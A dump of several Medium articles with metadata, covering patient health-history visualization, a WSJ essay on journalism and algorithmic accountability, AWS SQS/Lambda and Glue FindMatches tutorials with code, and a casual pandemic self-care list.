Dataset schema (per-column type and min/max value or string length):

Column      Type             Min   Max
Unnamed: 0  int64            0     192k
title       string (length)  1     200
text        string (length)  10    100k
url         string (length)  32    885
authors     string (length)  2     392
timestamp   string (length)  19    32
tags        string (length)  6     263
info        string (length)  45    90.4k
3,800
It’s Complicated
It’s Complicated
Visualizing complex health histories & symptoms for two patients with rare and mystery conditions

I recently worked with a smart, well-spoken patient, E., to put together a visual summary of her health. Unlike many others I’ve worked with, she was not looking for answers or a new diagnosis; she was motivated because she was starting the application process for a new service dog, and she needed to demonstrate her physical constraints and daily needs. She also had a complex medical history, with multiple chronic conditions, injuries, surgeries and procedures, and she wanted to see everything in one place for the first time.

I went through my standard process of gathering her information, talking through her story with her, and creating visuals to represent the conversation. I then created a detailed timeline and symptom map, with an emphasis on her two longstanding conditions, Cryoglobulinemia and Ehlers-Danlos Syndrome (EDS). Both of these conditions are considered ‘rare diseases’ — meaning each one affects fewer than 200,000 Americans at any given time.

A quick aside with some definitions: Cryoglobulinemia is the presence of abnormal proteins in the blood, and symptoms often include skin lesions and purple spots, joint pain, peripheral neuropathy (in other words, burning or tingling in hands and feet), and more. EDS is a connective tissue disorder “generally characterized by joint hypermobility (joints that stretch further than normal), skin hyperextensibility (skin that can be stretched further than normal), and tissue fragility” (source: Ehlers-Danlos Society website). In addition to these two key diagnoses, E. also had Dysautonomia, an issue with her autonomic nervous system that causes fast heart rate, lightheadedness on standing, inability to regulate sweating, and more.

Altogether, these three conditions caused E. a whole host of symptoms and injuries, many stretching back to her childhood. She’d had six broken ankles between ages 10 and 15; at one point both of her ankles were broken at the same time. She estimated she’d had close to 50 surgeries since 1985. It was a lot to look back on, and it made for a very full timeline, as you can see below (most words and dates removed for privacy).
https://medium.com/pictal-health/its-complicated-60b2cb9c2398
['Katie Mccurdy']
2019-03-13 12:40:04.849000+00:00
['Design', 'Healthcare', 'Patient Experience', 'Health', 'Data Visualization']
3,801
What is the Role of Journalists in Holding Artificial Intelligence Accountable?
What is the Role of Journalists in Holding Artificial Intelligence Accountable?
The Wall Street Journal is experimenting with a new approach for reporting how smart algorithms work, beyond simply describing them.

Image Credit: Gabriel Gianordoli/WSJ

Journalists, who routinely ask questions of their sources, should also be asking questions about an algorithm’s methodology. The rules created for algorithms need to be explicit and understood. The Wall Street Journal has been experimenting with a new approach to explain how AI works by letting readers experiment with it.

“Interactive graphics can provide insights into how algorithms work in a way beyond simply describing its output. They can do this by acting as safe spaces in which readers can experiment with different inputs and immediately see how the computer might respond to it,” said deputy graphics director Elliot Bentley. “To make this accessible and non-intimidating, it’s important to design a straightforward interface with minimal controls, and also provide informative and immediate feedback,” Bentley added.

Image Credit: Gabriel Gianordoli/WSJ

The most recent example of letting readers experiment with algorithms is our story, “What Your Writing Says About You,” published as part of the Leadership issue of Journal Reports. The news experience offers an interface allowing people to enter text such as an essay, cover letter, blog post or business email and receive results from algorithms that rate the content by different parameters. By including detailed methodology and source notes, we allow our audiences to understand how machine learning and natural language processing can determine context, language mastery, meaning and even your mood from the choice of words.

“These explorable explainers allow us to not only go deeper, but also to give the readers a perspective on subjects like AI that we can’t give them by simply writing more great stories. It immerses them in a unique way in a subject we know they care about,” said Journal Reports editor Larry Rout.

In a previous Graphics project entitled “How Facial Recognition Software Works,” Bentley explained that readers need only to enable their webcam and begin moving their head around in order to play with a facial-recognition algorithm. It then provides clear, real-time feedback using a series of visual overlays. Another example of this is “Build Your Own Trading Bot,” in which we attempted to demystify algorithmic trading by designing a user-friendly interface and a rewarding feedback loop to encourage readers to experiment with the mechanics.

How Facial Recognition Software Works. Credit: Elliot Bentley/WSJ

Journalism and algorithmic accountability

We might not notice it, but artificial intelligence affects multiple parts of our lives. These algorithms decide whether an individual qualifies for a loan, whether a resume is seen by a recruiter, which seat a passenger is assigned on an airplane, which advertisements shoppers see online and what information on the internet is shown to users. Transparency of the data that feeds these processes is crucial both for consumers to better understand what they encounter and for organizations to shape their business strategy. Given the challenging nature of auditing algorithms, it’s important to consider how the practice of journalism can be leveraged to hold AI systems accountable.

In his forthcoming book, Northwestern University professor of computational journalism Nicholas Diakopoulos introduces the notion of algorithmic accountability reporting as an approach to highlight the influence that computer programs exercise in society.

“Operating at scale and often affecting large groups of people, algorithms make consequential and sometimes contestable decisions in an increasing range of domains throughout the public and private sectors. In response, a distinct beat in journalism is emerging to investigate the societal power exerted through such algorithms. There are various newsworthy angles on algorithms including discrimination and unfairness, errors and mistakes, social and legal norm violations, and human misuse. Reverse engineering and auditing techniques can be used to elucidate the contours of algorithmic power,” Diakopoulos explained.

The “black box” problem in AI

When certain decisions are derived through an algorithm, it’s often hard to pinpoint why or how an automatic output was derived. This introduces the problem of the “black box” algorithm, whereby correlations are made without rules set by humans. The term is often used as a metaphor for algorithms in which the process to reach a certain outcome cannot be seen in full.

“Auditing algorithms is not for the faint of heart. Information deficits, expectation setting, limited legal access, and shifting dynamic targets can all hamper an investigation. Working in teams, methods specialists working with domain experts can, however, overcome these obstacles and publish important stories about algorithms in society,” Diakopoulos added.

It’s indeed relevant to dissect how computers make decisions and to comprehend how smart systems are created. For example, the AI powering the set of analyses in “What Your Writing Says About You” is provided by Factbase, an AI company which makes its algorithms open source, peer reviewed, and available for examination. In “What Your Writing Says About You,” we explain the underlying scientific methodology behind each output, including the Flesch-Kincaid Grade Level — developed in 1975 by the Department of Defense to review the readability level of military materials — as well as the Treebank methodology created by the University of Pennsylvania to evaluate the linguistic structure of text.

“It’s important, as much as is possible, to understand the parameters under which the AI or algorithms arrived at its conclusions. What parameters it examines, and how it analyzes it, provides transparency to its thinking, per se, which in turn makes it more clear how it decides what it decides,” said Bill Frischling, founder of FactBase.

This issue is prevalent in artificial intelligence, partly because the systems are not necessarily designed to explain how they do certain things, but to just do them. This is also a byproduct of algorithms learning by themselves; they make causal links not based on human instruction but on self-identified patterns.

Newsroom collaboration

The Wall Street Journal’s news hub in New York City.

There are, of course, technical gaps to developing this type of reporting on algorithms, which can be addressed by working cross-functionally with data scientists, computational journalists and technologists. Increasingly, it’s important to foster a culture of collaboration throughout the newsroom and bring multiple perspectives into the process of story planning and development.

“A project such as this which taps so many areas of expertise and aligns them is a pleasure to be part of. What started with WSJ Lab’s original outline of possibilities was honed by a team of editors at Journal Reports to focus on specifically what our writing reveals about us. Our interactives team wrangled the code, user interface and graphic visualization,” said news editor Demetria Gallegos. “Then, privacy experts from our legal and data teams, our social and off-platform colleagues and homepage and mobile editors weighed in to ensure the experience is optimized for every reader,” Gallegos added.

The odds of a successful collaboration can be increased if the organization is able to foster an environment where journalists are encouraged to test new ideas, to seek feedback, and to share best practices even if experiments are unsuccessful. Building this “feedback loop” can enable news professionals to mitigate the uncertainty of experimentation as well as inform the broader newsroom strategy.

“When we are thinking about how to create an innovative news experience, we have to consider how readers already ingest news — and how much further they are willing to go. In our discussions during the story planning process, we ran through various scenarios of how the tool could work, based on different criteria. We then ruled out things that would require too much time or too many steps. We also had to be sensitive to how much information people are willing to disclose. We designed this interactive story to be fun enough to get readers in, engaging enough to have them read through it, take the quiz, play the game etc. And if they end up sharing their results on social media, we know we did it right,” explained news editor Cristina Lourosa.

Journalistic standards and technological evolution

Just because a certain result came from a computer, it doesn’t mean it’s right. Artificial intelligence is programmed by humans, and consequently it can make mistakes. The ethical considerations inherent to using AI are far and wide.

“Understanding the source of information, whether it’s from a person or an algorithm, is not only crucial for the news industry but, as well, for democracy,” said Kourosh Houshmand, a computational journalist at Columbia Journalism School.

The practice of journalism is about questioning the world around us, and that same principle still applies even when a piece of software played a role in a particular outcome such as determining the price of a product, evaluating how a person feels based on their writing or selecting a candidate for a job interview.

“We can help readers understand how technology works by explaining how the algorithms get their results and then pointing to the source documents and formulas that power the calculations,” said graphics reporter Nigel Chiwaya.

An effective way to understand AI is to experiment with it, comprehend the nuances of how algorithms make decisions and how those decisions may affect our lives.
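A quick aside on one measure mentioned above: the Flesch-Kincaid Grade Level is a published readability formula (0.39 × words per sentence + 11.8 × syllables per word − 15.59). The sketch below is only a rough illustration of computing such a score; the naive syllable counter is my own shortcut for this example, not the WSJ's or FactBase's implementation.

```python
# Rough illustration of the Flesch-Kincaid Grade Level formula:
#   0.39 * (words / sentences) + 11.8 * (syllables / words) - 15.59
# The syllable counter is a crude vowel-group heuristic used only for this example.
import re


def count_syllables(word: str) -> int:
    # Treat each run of consecutive vowels as one syllable, with a floor of 1.
    return max(1, len(re.findall(r'[aeiouy]+', word.lower())))


def flesch_kincaid_grade(text: str) -> float:
    sentences = max(1, len(re.findall(r'[.!?]+', text)))
    words = re.findall(r"[A-Za-z']+", text)
    syllables = sum(count_syllables(w) for w in words)
    return 0.39 * (len(words) / sentences) + 11.8 * (syllables / len(words)) - 15.59


sample = ("Journalists, who routinely ask questions of their sources, "
          "should also be asking questions about an algorithm's methodology.")
print(round(flesch_kincaid_grade(sample), 1))
```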
https://medium.com/the-wall-street-journal/what-is-the-role-of-journalists-in-holding-artificial-intelligence-accountable-9a6321e5a265
['Francesco Marconi']
2020-04-20 08:43:10.910000+00:00
['Algorithms', 'Artificial Intelligence', 'Journalism', 'Best Practices', 'Ethics']
3,802
Scheduling tasks with AWS SQS and Lambda
Scheduling tasks with AWS SQS and Lambda
By Engineering@ZenOfAI

In this story, we will be learning a workaround for how to schedule or delay a message using AWS SQS despite its 15-minute (900-second) upper limit. First, let us understand some SQS attributes briefly.

Delivery Delay lets you specify a delay between 0 and 900 seconds (15 minutes). When set, any message sent to the queue will only become visible to consumers after the configured delay period.

Visibility Timeout is the time during which a received message will be invisible to other consumers unless it’s deleted from the queue. If you want to learn about dead letter queues and deduplication, you could follow my other article: Processing High Volume Big Data Concurrently with No Duplicates using AWS SQS.

So, when a consumer receives a message, the message remains in the queue but is invisible for the duration of its visibility timeout, after which other consumers will be able to see the message. Ideally, the first consumer would handle and delete the message before the visibility timeout expires. The upper limit for the visibility timeout is 12 hours.

We could leverage this to schedule or delay a task. A typical combination would be SQS with Lambda, where the invoked function executes the task. Usually, standard queues enabled with Lambda triggers have immediate consumption: when a message is inserted into the standard queue, the Lambda function is invoked immediately with the message available in the event object. Note: if the Lambda results in an error, the message stays in the queue for further receive requests; otherwise it is deleted.

That said, there could be two cases:
1. A generic setup that can adapt to a range of time delays.
2. A stand-alone setup built to handle only a fixed time delay.

The idea is to insert a message into the queue with the task details and the time to execute (target time), and have the Lambda do the dirty work.

Case 1: The Lambda function checks if the target time equals the current time. If so, it executes the task, and the message is deleted as the Lambda finishes without error. Otherwise, it changes the visibility timeout of that message in the queue to the delta difference and raises an error, leaving the message in the queue. (A hedged sketch of this approach follows below.)

Case 2: The queue’s default visibility timeout is configured with the required fixed time delay. The Lambda function checks if the difference between the target time and the current time equals the fixed time delay. If so, it executes the task, and the message is deleted as the Lambda finishes without error. Otherwise, it simply raises an error, leaving the message untampered in the queue. The message is retried after its visibility timeout, which is the required fixed time delay, and is then executed.

The problem with this approach is accuracy and scalability.
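Before the Case 2 handler below, here is a minimal sketch of what the Case 1 approach could look like. This code is not from the original write-up: the ISO-8601 execute_at format, the QUEUE_URL environment variable and the queue setup are my own assumptions, so treat it as a starting point rather than a finished implementation.

```python
# Hypothetical sketch of the Case 1 handler (generic delays); not from the original article.
# Assumptions: the message body carries 'task_details' and an ISO-8601 'execute_at' timestamp,
# and the queue URL is provided to the function via a QUEUE_URL environment variable.
import json
import os
from datetime import datetime, timezone

import boto3

sqs = boto3.client('sqs')
QUEUE_URL = os.environ['QUEUE_URL']   # assumed environment variable
MAX_VISIBILITY = 12 * 60 * 60         # SQS caps the visibility timeout at 12 hours


def lambda_handler(event, context):
    record = event['Records'][0]
    body = json.loads(record['body'])

    target = datetime.fromisoformat(body['execute_at'])   # e.g. "2020-02-16T14:00:00+00:00"
    remaining = (target - datetime.now(timezone.utc)).total_seconds()

    if remaining <= 0:
        # Target time reached: run the task; returning normally lets Lambda delete the message.
        print("executing:", body['task_details'])
        return

    # Not time yet: push this message's visibility out by the remaining delta
    # (capped at the 12-hour limit), then fail so the message stays in the queue.
    sqs.change_message_visibility(
        QueueUrl=QUEUE_URL,
        ReceiptHandle=record['receiptHandle'],
        VisibilityTimeout=min(int(remaining), MAX_VISIBILITY),
    )
    raise Exception("Rescheduled: target time not reached yet")
```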
Here’s the Lambda code for Case 2 (Processor.py):

import json
from datetime import datetime

import dateutil.tz

tz = dateutil.tz.gettz('US/Central')
fixed_time_delay = 1  # the fixed delay, expressed here in hours; change the value and unit to suit


def lambda_handler(event, context):
    message = event['Records'][0]
    # print(message)
    result = json.loads(message['body'])
    task_details = result['task_details']
    target_time = result['execute_at']

    # Parse the target execution time carried in the message body.
    tt = datetime.strptime(target_time, "%d/%m/%Y, %H:%M %p CST")
    print(tt)

    # Current time, formatted and re-parsed so both datetimes are naive and comparable.
    t_now = datetime.now(tz)
    time_now = t_now.strftime("%d/%m/%Y, %H:%M %p CST")
    tn = datetime.strptime(time_now, "%d/%m/%Y, %H:%M %p CST")
    print(tn)

    delta_time = tn - tt
    print(delta_time)

    # Express the delta in the same unit as fixed_time_delay (hours here;
    # use 60 as the divisor for minutes, or 1 for seconds).
    delta_in_hours = round(delta_time.total_seconds() / 3600)

    if delta_in_hours == fixed_time_delay:
        # Execute the task logic; a clean return lets Lambda delete the message.
        print(task_details)
    else:
        # Raise so the message stays in the queue and is retried after its
        # visibility timeout (the required fixed time delay).
        raise Exception("Fixed time delay not reached; leaving message in the queue")

Conclusion: Scheduling tasks using SQS isn’t effective in all scenarios. You could use AWS Step Functions’ wait state to achieve millisecond accuracy, or DynamoDB’s TTL feature to build an ad hoc scheduling mechanism; the choice of service is largely dependent on the requirement. So, here’s a wonderful blog post that gives you a bigger picture of the different ways to schedule a task on AWS.

This story is authored by Koushik. Koushik is a software engineer specializing in AWS Cloud Services.
https://medium.com/zenofai/scheduling-tasks-with-aws-sqs-and-lambda-82bdcfbc0fd8
['Engineering Zenofai']
2020-02-20 14:14:17.090000+00:00
['Software Development', 'AWS Lambda', 'AWS', 'Cloud Computing']
3,803
Machine Learning based Fuzzy Matching using AWS Glue ML Transforms
Machine Learning Transforms in AWS Glue

AWS Glue provides machine learning capabilities to create custom transforms that do machine-learning-based fuzzy matching to deduplicate and cleanse your data. For this we are going to use a transform named FindMatches. The FindMatches transform enables you to identify duplicate or matching records in your dataset, even when the records do not have a common unique identifier and no fields match exactly. This will not require writing any code or knowing how machine learning works. For more details about ML Transforms, please go through the docs.

Creating a Machine Learning Transform with AWS Glue

This article walks you through the actions to create and manage a machine learning (ML) transform using AWS Glue. I assume that you are familiar with using the AWS Glue console to add crawlers and jobs and edit scripts. You should also be familiar with finding and downloading files on the Amazon Simple Storage Service (Amazon S3) console. In case you are just starting out on AWS Glue, I have explained how to create an AWS Glue Crawler and Glue Job from scratch in one of my earlier articles.

The source data used in this blog is a hypothetical file named customers_data.csv. A second file, label_file.csv, is an example of a labeling file that contains both matching and nonmatching records used to teach the transform.

Step 1: Crawl the Data using AWS Glue Crawler

At the outset, crawl the source data from the CSV file in S3 to create a metadata table in the AWS Glue Data Catalog. I created a crawler pointing to the source location (s3://bucketname/data/ml-transform/customers/). In case you are just starting out on the AWS Glue crawler, I have explained how to create one from scratch in one of my earlier articles. If you run this crawler, it creates a customers table in the specified database (ml-transform).

Step 2: Add a Machine Learning Transform

Next, add a machine learning transform that is based on the schema of your data source table created by the above crawler. Choose Worker type and Maximum capacity as per the requirements.
3. For Data source, choose the table that was created in the earlier step. In this case, the table named customers in database ml-transform.
4. For Primary key, choose the primary key column for the table, email.

Step 3: How to Teach Your Machine Learning Transform

Next, teach the machine learning transform using the sample labeling file. You can’t use a machine learning transform in an extract, transform, and load (ETL) job until its status is Ready for use. To get your transform ready, you must teach it how to identify matching and non-matching records by providing examples of matching and non-matching records. To teach your transform, you can Generate a label file, add labels, and then Upload label file. For this article, the label file I have used is label_file.csv.

On the AWS Glue console, in the navigation pane, choose ML Transforms.
Choose the earlier created transform, and then choose Action, Teach.
If you don’t have the label file, choose I do not have labels; you can Generate a label file, add labels, and then Upload label file.
If you have the label file, choose I have labels, then choose Upload labelling file from S3.
Choose an Amazon S3 path to the sample labeling file in the current AWS Region (s3://bucketname/data/ml-transform/labels/label_file.csv), with the option to overwrite existing labels. The labeling file must be located in S3 in the same Region as the AWS Glue console.
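As an aside, the console actions in Steps 2 and 3 can also be scripted. The sketch below uses boto3's Glue client; the transform name and IAM role ARN are placeholders I've made up, so treat it as a rough illustration rather than part of the original walkthrough.

```python
# Hypothetical boto3 equivalent of Steps 2 and 3 above; names and the role ARN are placeholders.
import boto3

glue = boto3.client('glue')

# Step 2: create a FindMatches ML transform over the crawled customers table.
response = glue.create_ml_transform(
    Name='customers-find-matches',                      # placeholder transform name
    Role='arn:aws:iam::123456789012:role/GlueMLRole',   # placeholder IAM role ARN
    InputRecordTables=[{'DatabaseName': 'ml-transform', 'TableName': 'customers'}],
    Parameters={
        'TransformType': 'FIND_MATCHES',
        'FindMatchesParameters': {'PrimaryKeyColumnName': 'email'},
    },
)
transform_id = response['TransformId']

# Step 3: teach the transform by importing the prepared labeling file from S3.
glue.start_import_labels_task_run(
    TransformId=transform_id,
    InputS3Path='s3://bucketname/data/ml-transform/labels/label_file.csv',
    ReplaceAllLabels=True,
)
```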
When you upload a labeling file, a task is started in AWS Glue to add or overwrite the labels used to teach the transform how to process the data source.

Step 4: Estimate the Quality of ML Transform

What is Labeling? The act of labeling is creating a labeling file (such as in a spreadsheet) and adding identifiers, or labels, into the label column that identify matching and non-matching records. It is important to have a clear and consistent definition of a match in your source data. AWS Glue learns from which records you designate as matches (or not) and uses your decisions to learn how to find duplicate records.

Next, you can estimate the quality of your machine learning transform. The quality depends on how much labeling you have done.

On the AWS Glue console, in the navigation pane, choose ML Transforms.
Choose the earlier created transform, and choose the Estimate quality tab. This tab displays the current quality estimates, if available, for the transform.
Choose Estimate quality to start a task to estimate the quality of the transform. The accuracy of the quality estimate is based on the labeling of the source data.
Navigate to the History tab. In this pane, task runs are listed for the transform, including the Estimating quality task. For more details about the run, choose Logs. Check that the run status is Succeeded when it finishes.

Step 5: Create and run a Job with ML Transform

In this step, we use your machine learning transform to add and run a job in AWS Glue. When the transform is Ready for use, we can use it in an ETL job.

On the AWS Glue console, in the navigation pane, choose Jobs, then choose Add job. In case you are just starting out on AWS Glue ETL jobs, I have explained how to create one from scratch in one of my earlier articles.
For Name, use the example job name in this tutorial, ml-transform.
Choose an IAM role that has permission to access Amazon S3 and AWS Glue API operations.
For ETL language, choose Spark 2.2, Python 2. Machine learning transforms are currently not supported for Spark 2.4.
For Data source, choose the table created in Step 1. The data source you choose must match the machine learning transform data source schema.
For Transform type, choose Find matching records to create a job using a machine learning transform.
For Transform, choose the transform created in Step 2, the machine learning transform used by the job.
For Create tables in your data target, choose to create tables with the following properties:
Data store type — Amazon S3
Format — CSV
Compression type — None
Target path — the Amazon S3 path where the output of the job is written (in the current console AWS Region)
Choose Save job and edit script to display the script editor page. The script looks like the following. After you edit the script, choose Save.
import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
from awsglueml.transforms import FindMatches

## @params : [JOB_NAME]
args = getResolvedOptions(sys.argv, ['JOB_NAME'])

sc = SparkContext()
glueContext = GlueContext(sc)
spark = glueContext.spark_session
job = Job(glueContext)
job.init(args['JOB_NAME'], args)

## @type : DataSource
## @args : [database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0"]
## @return : datasource0
## @inputs : []
datasource0 = glueContext.create_dynamic_frame.from_catalog(database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0")

## @type : ResolveChoice
## @args : [choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1"]
## @return : resolvechoice1
## @inputs : [frame = datasource0]
resolvechoice1 = ResolveChoice.apply(frame = datasource0, choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1")

## @type : FindMatches
## @args : [transformId = "eacb9a1ffbc686f61387f63", emitFusion = false, survivorComparisonField = " ", transformation_ctx = "findmatches2"]
## @return : findmatches2
## @inputs : [frame = resolvechoice1]
findmatches2 = FindMatches.apply(frame = resolvechoice1, transformId = "eacb9a1ffbc686f61387f63", transformation_ctx = "findmatches2")

## @type : DataSink
## @args : [connection_type = "s3", connection_options = {"path": "s3://<bucket-name>/data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3"]
## @return : datasink3
## @inputs : [frame = findmatches2]
datasink3 = glueContext.write_dynamic_frame.from_options(frame = findmatches2, connection_type = "s3", connection_options = {"path": "s3://<bucket-name>/data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3")

job.commit()

Choose Run job to start the job run. Check the status of the job in the jobs list. When the job finishes, in the ML transform's History tab, there is a new Run ID row added of type ETL job. Navigate to the Jobs, History tab. In this pane, job runs are listed. For more details about the run, choose Logs. Check that the run status is Succeeded when it finishes.

Step 6: Verify Output Data from Amazon S3 in Amazon Athena

In this step, check the output of the job run in the Amazon S3 bucket that you chose when you added the job.
You can create a table in the Glue Data Catalog pointing to the output location, just like the way we crawled the source data in Step 1. You can then query the data in Athena (a hedged query sketch appears after the closing note below). However, the Find matches transform adds another column named match_id to identify matching records in the output. Rows with the same match_id are considered matching records. If you don’t find any matches, you can continue to teach the transform by adding more labels.

Thanks for the read, and I look forward to your comments. This story is authored by PV Subbareddy. Subbareddy is a Big Data Engineer specializing in AWS Big Data Services and the Apache Spark ecosystem.
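To make the Step 6 check concrete, here is a hedged sketch of launching an Athena query that groups the output rows by match_id. The database name, output table name and results location are assumptions you would replace with your own; this is not part of the original walkthrough.

```python
# Hypothetical Step 6 check: count the rows that share a match_id in the crawled output table.
# The database, table and results-location names are placeholders, not values from the article.
import boto3

athena = boto3.client('athena')

query = """
    SELECT match_id, COUNT(*) AS records_in_group
    FROM customers_matches
    GROUP BY match_id
    HAVING COUNT(*) > 1
    ORDER BY records_in_group DESC
"""

response = athena.start_query_execution(
    QueryString=query,
    QueryExecutionContext={'Database': 'ml_transform_output'},
    ResultConfiguration={'OutputLocation': 's3://bucketname/athena-query-results/'},
)
print('Started Athena query:', response['QueryExecutionId'])
```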
https://medium.com/zenofai/machine-learning-based-fuzzy-matching-using-aws-glue-ml-transforms-761ad208bdbe
['Engineering Zenofai']
2019-11-21 09:46:35.064000+00:00
['Cloud Computing', 'Machine Learning', 'Spark', 'AWS', 'Software Development']
3,804
Do These Things To Survive The Rest of The Pandemic
Do These Things To Survive The Rest of The Pandemic
Upgrade your mask. Eat healthy. Sleep. Laugh.

You could say round one of the pandemic is over. We didn’t do very well. Plus, round two has already started. The good news is that science has a plan for us. I’m not a scientist, but I listen to science. I got an A in AP biology and a B+ in chemistry, which already makes me more qualified than most of our politicians. Smart people have been taking this thing very seriously. We always do our homework. So here’s a list of practical things you can do to actually make it through this winter:

Upgrade your mask.

The health experts say the point of wearing a mask is to protect other people. Unfortunately, there’s a lot of idiots out there who think it’s a terrible assault on their personal freedom. So you’re going to have to level up your facegear. Everyone in the world is selling masks right now. Kylie Jenner probably has one. Hold on. Let me check. Yep. She’s got one. Take a look:

Kylie Jenner’s face mask. (Not recommended.)

Wow. That looks safe… Try this instead: Get a nanofiber mask. You need a mask that filters down to .3 microns. These are called N95 filters. Earlier this year they were hard to come by, and you’d probably go to hell for buying them, because that would’ve meant depriving hospitals of PPE. Good news, a lot’s changed since then. A few months ago, startup companies like Filti started making high quality masks and replaceable filters with nanofiber materials. They’re not medical grade, but they’re lab tested. There’s also HALO Mask, which makes the same kinds of products, using nanofiber manufactured in New Zealand. I did my homework. They’re both legit. (And they’re not paying me anything to plug them. They barely know I exist.)

This means you can go run errands without freaking out whenever some covidiot crosses your path without a mask. Same goes if you can’t work from home. Your mask actually protects you. How much? A helluva lot more than your standard generic face mask at most stores. I’ll take it.

You’re skeptical. That’s cool. Researching masks turned into a summer project. I spent weeks digging through articles and websites. Finally, a reliable newspaper published this piece explaining how mask filtration works. Basically: Yes, the coronavirus is smaller than .3 microns. (.1 micron, to be exact.) But that doesn’t mean anything by itself, for two reasons: Viruses always attach to larger particles. Nobody inhales free-floating virus. They inhale droplets, which are always 1.0 micron or bigger. You’re filtering the droplets with virus attached to them, not the naked virus particles themselves. Masks with .3 micron filtration can capture particles smaller than that because of a phenomenon called “Brownian motion.” That means very small particles move in a jagged zig-zag pattern, which increases the chances they’ll get snagged. So you’ve got a plan for a decent mask. Now what?

Start taking Vitamin D

You should be taking a multivitamin. On top of that, the experts are starting to learn that if you’re topped off on Vitamin D, you probably have a lesser risk of dying from the coronavirus. Hey, you might as well try. You can take a supplement. You can drink milk and orange juice. You can eat salmon. You can make sure you spend half an hour outside. Yes, every day. No, you can’t just sit by your window and read. I’m lazy. I checked. Glass blocks the specific spectrum of light your body needs.

Start eating your veggies.

Your immune system likes healthy food. Dark greens: Kale. Spinach. Broccoli. Asparagus. Plus onions and tomatoes. Even my 2-year-old eats kale now. I mix up a bunch of vegetables and kale in a giant batch and pour balsamic and lemon juice all over it. Add some pepper and feta cheese, and some olive oil. I can eat that all day.

Start making elderberry syrup.

Some studies show it helps reduce the duration and severity of the flu and other viruses. Buying elderberry syrup in a bottle is expensive. So you can make your own. Just buy some elderberries in bulk. You can find all kinds of recipes for syrup online.

Stop drinking so much.

You’re going to need your liver. Alcohol is bad for it, and basically everything else in your body. New studies have killed that cozy idea that drinking in moderation might improve your health. Basically, the downsides of boozing far outweigh the benefits. Alcohol might lower the risk of heart disease, but it increases the risk of cancer and liver disease. I know. This sucks. We’ve all been using health as an excuse to justify drinking a helluva lot more than usual this year. You’re gonna have to reel it in. You get to drink once a week now, if that. And you get to have one or two drinks maximum. It’s almost, like, not even worth it. Did you know the number one reason people drink is boredom? So I guess you’ll need to find a hobby. Let’s move on to your mental and emotional health.

Learn to be okay with a mess.

For the first six months, I was all about chores. They relaxed me. Seeing a perfectly clean sink brought me peace. Folding laundry calmed me down. Then something changed. Work got busy again. My toddler developed advanced mess-making skills. Keeping the house clean morphed into a set of expectations I was placing on myself. I sacrificed sleep to keep everything tidy. This had to stop. Upon reflection, I figured out what I was doing. I was stress cleaning. Chores were a way for me to feel like I had control.

Learn how to do nothing.

The answer to stress cleaning was learning to let go of control, as in literally just stop my brain and do nothing for ten or fifteen minutes. It was easier than I thought. I was ready for a break. I just had to give myself one. Now I’m cured. A handful of dirty dishes in the sink doesn’t stress me out anymore. I can’t afford to let it. Doing nothing is the most relaxing thing in the world right now. It beats just about everything else.

Stop trying to relax.

Relaxing is overrated now. In the pandemic era, it doesn’t work. I finally realized that everything I was trying to do to “chill out” was just overstimulating or triggering me. After a while, my favorite shows just made me think too much about the future, or too much about the past. So just do nothing. Or…

Stop your revenge bedtime procrastination.

We already weren’t getting enough sleep before the pandemic. Part of the problem is that we convince ourselves to stay up too late. We do that because we’re trying to steal back a part of our day. The Japanese call this “revenge bedtime procrastination.” They have the best names for everything. Sleep is more important than ever. So when you’re tired, do what Samuel L. Jackson says. Just go the f*ck to sleep, man. It’s almost winter. You’re a mammal. Your body wants to hibernate. Let it. That doesn’t mean sleeping the next six months in a cave. But it does mean going to bed when you feel tired, regardless of what time it is. I’ve been going down around 10 pm some nights, about two or three hours early for my taste. But it’s giving me a lot more energy. I wake up at 5 or 6 am, ready to go.

Finally become a morning person.

If you’re stuck in quarantine with family, then super early mornings are basically the only way you can work in peace now. Back in June, I could work under distraction and disruption. Sometimes I still can. But making that the norm was wearing me out. So if I actually want to be productive, I’ll wake up at 4 am and work for a few hours before the kid arises. It helps. It makes the rest of the day more relaxing.

Stop trying to not talk about the news.

You know what happens when you try to not talk about the news? You think about it. Then you talk about it anyway. Then you feel guilty. What a vicious cycle. If you want to gleefully speculate about when Trump’s going to have a relapse, then just do it. Get it out of your system.

Remember to laugh.

Take the world seriously. But not that seriously. We were all freaking out about the first presidential debate. The top Google search the next day was “move to New Zealand.” Then Jim Carrey and Alec Baldwin saved us. They reminded us how comically absurd that entire debate was. Don’t forget to laugh. It provides perspective. It also boosts your immune system. So watch comedy. Tell jokes. Be sarcastic.

Find happiness where you can.

It surprises me how often I’m actually happy when I follow all this advice. It almost feels like the world isn’t falling apart. I feel prepared for worst case scenarios. I’m not scared of the bottom anymore. I know what we’ll be doing for the next six months, and I know what’s going to happen. Now it’s just a matter of getting through it. So upgrade your mask. Take your vitamins. Eat your veggies. Cool it with the alcohol. Go to sleep when you’re tired. Stop stress cleaning your house. Remind yourself how to just do nothing. Stop trying so hard to not be in a pandemic. Just be in it. Don’t forget to laugh.
https://medium.com/the-haven/do-these-things-to-survive-the-rest-of-the-pandemic-f66e0245a9f5
['Jessica Wildfire']
2020-10-09 04:59:22.849000+00:00
['Mindfulness', 'Humor', 'Health', 'Culture', 'Society']
Title Things Survive Rest PandemicContent Things Survive Rest Pandemic Upgrade mask Eat healthy Sleep Laugh could say round one pandemic didn’t well Plus round two already started good news science plan u I’m scientist listen science got AP biology B chemistry already make qualified politician Smart people taking thing seriously always homework here’s list practical thing actually make winter Upgrade mask health expert say point wearing mask protect people Unfortunately there’s lot idiot think it’s terrible assault personal freedom you’re going level facegear Everyone world selling mask right Kylie Jenner probably one Hold Let check Yep She’s got one Take look Kylie Jenner’s face mask recommended Wow look safe… Try instead Get nanofiber mask need mask filter 3 micron called N95 filter Earlier year hard come you’d probably go hell buying would’ve meant depriving hospital PPE Good news lot’s changed since month ago startup company like Filti started making high quality mask replaceable filter nanofiber material They’re medical grade they’re lab tested There’s also HALO Mask make kind product using nanofiber manufactured New Zealand homework They’re legit they’re paying anything plug barely know exist mean go run errand without freaking whenever covidiot cross path without mask go can’t work home mask actually protects much helluva lot standard generic face mask store I’ll take 